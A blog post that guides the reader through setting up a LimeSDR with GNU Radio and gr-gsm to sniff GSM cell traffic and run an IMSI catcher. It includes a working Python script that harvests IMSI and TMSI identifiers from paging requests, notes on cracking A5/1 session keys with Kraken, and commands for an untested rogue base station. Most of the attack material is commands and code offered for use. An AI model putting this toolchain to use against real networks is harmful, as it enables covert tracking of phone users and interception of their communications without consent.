Saturday 1 July 2017

LimeSDR Ubuntu Desktop 14.04 x86_64 Setup and IMSI Catcher

This post will guide you through setting up a simple IMSI catcher with a LimeSDR inside a VMware virtual machine.

I am using Ubuntu Desktop 14.04 amd64 in this setup.
The full command guideline is on Github.
Connect the LimeSDR over USB 3.0 and pass it through to the VM.

Download and install Ubuntu in VMware.


Download and install cmake manually, because LimeSuite requires cmake 3.1.3 or newer and the cmake package in Ubuntu 14.04 is older than that.


Decompress cmake file:

  • tar -zxvf cmake-3.8.2-Linux-x86_64.tar.gz


We will run everything as root. Move cmake to /opt and symlink its binaries into the PATH:

  • sudo su -
  • mv cmake-3.8.2-Linux-x86_64/ cmake
  • mv cmake /opt/cmake
  • ln -s /opt/cmake/bin/* /usr/local/bin
Add LimeSDR driver repository:
  • sudo add-apt-repository -y ppa:myriadrf/drivers
  • sudo apt-get update


Install git, python-pip and python-dev packages:

  • sudo apt-get install git python-pip python-dev



Install PyBombs, add the recipe repositories and initialise a prefix at /usr/local (the -R flag installs the gnuradio-default recipe into the new prefix; UHD and the other packages are installed through PyBombs below):

  • pip install git+https://github.com/gnuradio/pybombs.git
  • pybombs recipes add gr-recipes git+https://github.com/gnuradio/gr-recipes.git
  • pybombs recipes add gr-etcetera git+https://github.com/gnuradio/gr-etcetera.git
  • pybombs prefix init /usr/local -a myprefix -R gnuradio-default




Install packages for LimeSuite:

  • sudo apt-get install g++ libsqlite3-dev libsoapysdr-dev libi2c-dev libusb-1.0-0-dev libwxgtk3.0-dev freeglut3-dev

Git clone LimeSuite:
  • git clone https://github.com/myriadrf/LimeSuite.git
  • cd LimeSuite
  • mkdir builddir && cd builddir
  • cmake ../
  • make -j4
  • make install



Run ldconfig so the dynamic loader picks up the newly installed shared libraries:
  • ldconfig
Install gqrx, gr-osmosdr and uhd using PyBombs:
  • pybombs install gqrx gr-osmosdr uhd



Run ldconfig again so the dynamic loader picks up the newly installed shared libraries:
  • ldconfig
Git clone EttusResearch UHD:
  • git clone https://github.com/EttusResearch/uhd.git
  • cd uhd/host/lib/usrp
Git clone OpenUSRP, which lets the LimeSDR present itself to UHD as a USRP B210, and add it to the UHD build:
  • git clone https://github.com/jocover/OpenUSRP.git
  • echo "INCLUDE_SUBDIRECTORY(OpenUSRP)">>CMakeLists.txt
  • cd OpenUSRP


** Note **
If your checkout of OpenUSRP does not contain the lines below you can skip the next step. If you compile, build and install but UHD still cannot find the device, use the same UHD revision I used during the setup; you may need to delete the build folder at uhd/host/build first.

Edit limesdr_io_impl.cpp:
  • Comment out lines 691 to 696
  • Comment out lines 698 to 699


Build and install UHD:
  • cd ../../../
  • mkdir build && cd build
  • cmake ..
  • make -j10
  • make install
  • ldconfig
  • echo 'export UHD_MODULE_PATH=/usr/lib/uhd/modules' >> ~/.bashrc
  • source ~/.bashrc



Check that UHD finds the LimeSDR with uhd_usrp_probe:
  • uhd_usrp_probe


Install gr-gsm using PyBombs:
  • pybombs install gr-gsm
  • ldconfig

Clone airprobe, kalibrate-rtl and the gnuradio 3.7 patch for airprobe:
  • git clone https://github.com/ksnieck/airprobe.git
  • git clone https://github.com/steve-m/kalibrate-rtl
  • git clone https://github.com/scateu/airprobe-3.7-hackrf-patch.git


Install packages:
  • apt-get install git-core autoconf automake libtool g++ python-dev swig libpcap0.8-dev uhd-host libboost-all-dev libusb-1.0-0 libusb-1.0-0-dev libfftw3-dev swig python-numpy


Patch airprobe for gnuradio 3.7 compatibility:
  • cd airprobe-3.7-hackrf-patch/
  • cp * ../airprobe
  • cd ../airprobe
  • patch -p1 < zmiana.patch

Install gsm-receiver:
  • cd gsm-receiver/
  • ./bootstrap
  • ./configure
  • make
  • make install



Install wireshark:
  • apt-get install wireshark

Scan for GSM cells (grgsm_scanner prints the ARFCN, frequency, CID, LAC, MCC, MNC and power of each cell it finds):
  • grgsm_scanner -v
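grgsm_scanner reports each cell by ARFCN, while grgsm_livemon, airprobe and grgsm_decode want a frequency. The following is an added example (my code, not part of gr-gsm, which ships its own ARFCN helper) that converts between the two for the GSM900, E-GSM, DCS1800 and PCS1900 bands; the band edges come from 3GPP TS 45.005, the band names and function names are my own. It also handles the one real pitfall: ARFCNs 512 to 810 exist in both DCS1800 and PCS1900, so the band has to be given explicitly there.

```python
CHANNEL_SPACING_MHZ = 0.2

# band name: (first ARFCN, last ARFCN, downlink frequency of the first ARFCN in MHz,
#             uplink offset in MHz). Edges per 3GPP TS 45.005.
BANDS = {
    "GSM900":  (0, 124, 935.0, -45.0),
    "E-GSM":   (975, 1023, 925.2, -45.0),     # extended band, numbered 975..1023
    "DCS1800": (512, 885, 1805.2, -95.0),
    "PCS1900": (512, 810, 1930.2, -80.0),     # overlaps DCS1800 numbering
}


def candidate_bands(arfcn):
    """Names of every band whose ARFCN range contains arfcn (more than one means ambiguous)."""
    return [name for name, (first, last, _, _) in BANDS.items() if first <= arfcn <= last]


def arfcn_to_freq(arfcn, band=None, uplink=False):
    """Centre frequency in Hz for an ARFCN; band must be given where DCS1800/PCS1900 overlap."""
    names = [n for n in candidate_bands(arfcn) if band is None or n == band]
    if len(names) != 1:
        raise ValueError("ARFCN %d: ambiguous or unknown band, candidates %s" % (arfcn, names))
    first, _, dl_first, ul_offset = BANDS[names[0]]
    mhz = dl_first + CHANNEL_SPACING_MHZ * (arfcn - first)
    if uplink:
        mhz += ul_offset                      # uplink carrier sits a fixed duplex distance below
    return int(round(mhz * 1e6))


def freq_to_arfcn(freq_hz, uplink=False):
    """Inverse lookup: (band, ARFCN) whose centre lies within 100 kHz of freq_hz."""
    mhz = freq_hz / 1e6
    for name, (first, last, dl_first, ul_offset) in BANDS.items():
        base = dl_first + (ul_offset if uplink else 0.0)
        n = first + int(round((mhz - base) / CHANNEL_SPACING_MHZ))
        if first <= n <= last and abs(base + CHANNEL_SPACING_MHZ * (n - first) - mhz) < 0.1:
            return name, n
    raise ValueError("%.1f MHz is not a GSM carrier in the known bands" % mhz)


if __name__ == "__main__":
    # The frequencies used later in this post, resolved to ARFCNs.
    for hz in (935.8e6, 950.2e6, 935.2e6):
        print("%.1f MHz -> %s ARFCN %d" % (hz / 1e6, *freq_to_arfcn(int(hz))))
```

The -f value for grgsm_livemon or airprobe is the downlink frequency, so use the default uplink=False; only switch to uplink when you deliberately tune to what the phone transmits.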

Capture GSM traffic on one of the frequencies the scanner found (935.8 MHz here):
  • grgsm_livemon -f 935.8M -s 1e6

Open a second tab and start Wireshark capturing on the loopback interface. gr-gsm sends the decoded bursts as GSMTAP over UDP to 127.0.0.1:4729, so capture on lo and use the display filter gsmtap:
  • wireshark


Stop grgsm_livemon and record a capture to a cfile with airprobe_rtlsdr_capture.py (60 seconds at 950.2 MHz, 1 Msps, gain 40):
  • airprobe_rtlsdr_capture.py -f 950200000 -s 1000000 -g 40 -c capture.cfile -T 60

Restart Wireshark, then run grgsm_decode on the cfile to decode the BCCH on timeslot 0:
  • grgsm_decode -f 950200000 -s 1e6 -c capture.cfile -m BCCH -t 0
Notice the Immediate Assignment packet: its Channel Description points at an SDCCH8 on timeslot 1.


Restart Wireshark and decode the same cfile again, this time the SDCCH8 on timeslot 1 that the Immediate Assignment pointed to:
  • grgsm_decode -f 950200000 -s 1e6 -c capture.cfile -m SDCCH8 -t 1
Notice the TMSI and that the ciphering is A5/1. To decrypt the traffic you need the session key Kc, either read from the SIM card or recovered with Kraken; the A5/1 rainbow tables are well over a terabyte, so due to limited storage cracking Kc is not shown here. Crazy Danish Hacker has a good tutorial on cracking GSM traffic (reference 2 below).



Install IMSI Catcher:
  • git clone https://github.com/Oros42/IMSI-catcher.git
  • apt-get install python-numpy python-scipy python-scapy



Run the IMSI catcher in the first tab:

  • python simple_IMSI-catcher.py


Run airprobe_rtlsdr in the second tab:

  • airprobe_rtlsdr.py -f 935.2M -g 40 -s 1e6

If the IMSI catcher prints nothing, tune airprobe to a BCCH frequency that grgsm_scanner actually found: the catcher only sees the paging requests of the cell you are decoding.
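What the catcher is doing underneath the Wireshark and airprobe steps above is parsing the GSMTAP datagrams gr-gsm sends to 127.0.0.1:4729 and pulling the Mobile Identity out of Paging Request Type 1 messages on the CCCH. The following is an added example written for Python 3 (my code, not gr-gsm's and not the IMSI-catcher project's) that does exactly that: it decodes the 16-byte GSMTAP v2 header, filters for downlink CCCH blocks, and decodes IMSI and TMSI identities per 3GPP TS 24.008 10.5.1.4 and TS 44.018 9.1.22. The sample datagrams at the bottom are constructed, not captured traffic, and the assumption that gr-gsm labels paging blocks with the CCCH sub_type and delivers 23-octet L2 blocks is mine; run it with --listen to use it live instead of simple_IMSI-catcher.py.

```python
import socket, struct, sys

GSMTAP_PORT = 4729                 # gr-gsm's default GSMTAP sink: UDP 127.0.0.1:4729
GSMTAP_TYPE_UM = 0x01              # GSM Um interface L2/L3 block
GSMTAP_CHANNEL_CCCH = 0x02         # sub_type assumed for paging/access-grant blocks from gr-gsm
PD_RR, MSG_PAGING_REQUEST_TYPE_1, IEI_MOBILE_IDENTITY_2 = 0x06, 0x21, 0x17   # TS 44.018 9.1.22
MI_TYPE_NAMES = {1: "IMSI", 2: "IMEI", 3: "IMEISV", 4: "TMSI"}

def parse_gsmtap(pkt):
    """Split a GSMTAP v2 datagram into its 16-byte header fields and the payload."""
    if len(pkt) < 16:
        raise ValueError("too short for a GSMTAP header")
    (version, hdr_len, typ, timeslot, arfcn, signal, snr,
     fn, sub_type, _ant, sub_slot, _res) = struct.unpack("!BBBBHbbIBBBB", pkt[:16])
    if version != 2:
        raise ValueError("unsupported GSMTAP version %d" % version)
    return {"type": typ, "timeslot": timeslot, "sub_slot": sub_slot, "frame_number": fn,
            "uplink": bool(arfcn & 0x4000), "arfcn": arfcn & 0x3FFF,    # bit 14 flags uplink
            "signal_dbm": signal, "snr_db": snr, "sub_type": sub_type & 0x7F,  # bit 7: ACCH
            "payload": pkt[hdr_len * 4:]}      # hdr_len is counted in 32-bit words

def decode_mobile_identity(mi):
    """Decode a Mobile Identity IE value (TS 24.008 10.5.1.4) into (kind, value)."""
    if not mi:
        raise ValueError("empty Mobile Identity")
    id_type = mi[0] & 0x07
    kind = MI_TYPE_NAMES.get(id_type, "type%d" % id_type)
    if id_type == 4:                           # TMSI: exactly four raw octets follow
        if len(mi) != 5:
            raise ValueError("TMSI identity must be 5 octets")
        return kind, "0x%08x" % struct.unpack("!I", mi[1:])[0]
    digits = [str(mi[0] >> 4)]                 # first BCD digit shares the type octet
    for b in mi[1:]:                           # then low nibble, high nibble, per octet
        digits += [str(b & 0x0F), str(b >> 4)]
    if not mi[0] & 0x08:                       # bit 4 clear: even count, drop the 0xF filler
        digits.pop()
    return kind, "".join(digits)

def paging_identities(block):
    """Identities in a 23-octet downlink CCCH block if it is a Paging Request Type 1, else []."""
    body = block[1:1 + (block[0] >> 2)] if block else b""   # L2 pseudo-length: top six bits
    if len(body) < 4 or (body[0] & 0x0F) != PD_RR or body[1] != MSG_PAGING_REQUEST_TYPE_1:
        return []
    pos = 3                                    # skip PD, message type, page mode/channels needed
    ln = body[pos]                             # Mobile Identity 1 is mandatory, LV encoded
    idents = [decode_mobile_identity(body[pos + 1:pos + 1 + ln])]
    pos += 1 + ln
    if pos + 1 < len(body) and body[pos] == IEI_MOBILE_IDENTITY_2:   # optional, TLV encoded
        ln = body[pos + 1]
        idents.append(decode_mobile_identity(body[pos + 2:pos + 2 + ln]))
    return idents

def harvest(datagrams):
    """Return (kind, value, arfcn, frame_number) for every identity paged in the datagrams."""
    seen = []
    for pkt in datagrams:
        try:
            hdr = parse_gsmtap(pkt)
            if hdr["type"] != GSMTAP_TYPE_UM or hdr["sub_type"] != GSMTAP_CHANNEL_CCCH or hdr["uplink"]:
                continue                       # only downlink CCCH carries paging requests
            for kind, value in paging_identities(hdr["payload"]):
                seen.append((kind, value, hdr["arfcn"], hdr["frame_number"]))
        except ValueError:
            continue                           # malformed burst: skip it, keep going
    return seen

def gsmtap_datagram(timeslot, arfcn, fn, sub_type, payload):
    """Build a GSMTAP v2 datagram like the ones gr-gsm emits (used for the constructed samples)."""
    return struct.pack("!BBBBHbbIBBBB", 2, 4, GSMTAP_TYPE_UM, timeslot, arfcn, -60, 10,
                       fn, sub_type, 0, 0, 0) + payload

def l2_block(l3):
    """Prefix the L2 pseudo-length octet and pad with 0x2B to the 23-octet CCCH block size."""
    blk = bytes([(len(l3) << 2) | 0x01]) + l3
    return blk + b"\x2b" * (23 - len(blk))

# Constructed samples, not captured traffic: IMSI 262021234567890, TMSIs 0x1234abcd and 0xdeadbeef.
MI_IMSI = bytes.fromhex("2926202143658709")
MI_TMSI_A, MI_TMSI_B = bytes.fromhex("f41234abcd"), bytes.fromhex("f4deadbeef")
PAGING_IMSI = l2_block(bytes([PD_RR, MSG_PAGING_REQUEST_TYPE_1, 0x00, len(MI_IMSI)]) + MI_IMSI)
PAGING_TMSI = l2_block(bytes([PD_RR, MSG_PAGING_REQUEST_TYPE_1, 0x00, len(MI_TMSI_A)]) + MI_TMSI_A
                       + bytes([IEI_MOBILE_IDENTITY_2, len(MI_TMSI_B)]) + MI_TMSI_B)
SYSINFO_3 = l2_block(bytes([PD_RR, 0x1B]) + b"\x00" * 16)          # System Information 3: ignored
SAMPLE_DATAGRAMS = [
    gsmtap_datagram(0, 4, 1000, GSMTAP_CHANNEL_CCCH, PAGING_IMSI),
    gsmtap_datagram(0, 4, 1051, GSMTAP_CHANNEL_CCCH, PAGING_TMSI),
    gsmtap_datagram(0, 4, 1102, GSMTAP_CHANNEL_CCCH, SYSINFO_3),
    gsmtap_datagram(0, 4 | 0x4000, 1103, GSMTAP_CHANNEL_CCCH, PAGING_IMSI),   # uplink: ignored
]

def listen(host="127.0.0.1", port=GSMTAP_PORT):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)   # live mode: same port gr-gsm sends to
    sock.bind((host, port))
    while True:
        for rec in harvest([sock.recvfrom(4096)[0]]):
            print("%-5s %s  ARFCN %d  frame %d" % rec)

if __name__ == "__main__":
    print(harvest(SAMPLE_DATAGRAMS))       # offline self-check on the constructed samples
    if "--listen" in sys.argv:
        listen()
```

Two things worth noting when you run this live: Wireshark only sniffs the loopback interface, so it can run alongside this script, but simple_IMSI-catcher.py also binds UDP 4729 and the two will fight over the port; and the IMSI you see in a Paging Request is the network paging a phone it has not yet assigned a TMSI to, which is why a busy cell produces them only now and then.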




To set up a rogue BTS:
  • osmo-nitb -c /root/osmo-combo/etc/osmocom/openbsc.cfg -l hlr.sqlite3 -P -C
  • osmobts-trx -t 2 -c /root/osmo-trx/example/osmo-bts.cfg
  • osmo-trx -c 1 -s 4 -e -l INFO

** You need to configure openbsc.cfg and osmo-bts.cfg with the MCC, MNC, LAC and CID first. I have not tested this.


Reference links used during the IMSI catcher setup:
  1. https://cn0xroot.com/2017/04/12/limesdr-getting-started-quickly/
  2. https://www.crazydanishhacker.com/gsm-cracking-sms-kraken-software-defined-radio-series-16/
  3. https://www.ckn.io/blog/2015/11/29/gsm-sniffing-sms-traffic/
Reference links for configuring a rogue BTS:
  1. https://www.youtube.com/watch?v=LV-CRJWC5_o
  2. https://fairwaves.co/docs/how_to%27s.html
  3. https://fairwaves.co/products/docs/soft_conf.html


Special thanks to the owner of the LimeSDR device =)





1 comment:

  1. I have a LimeSDR Mini! Would you think it supports OpenUSRP?
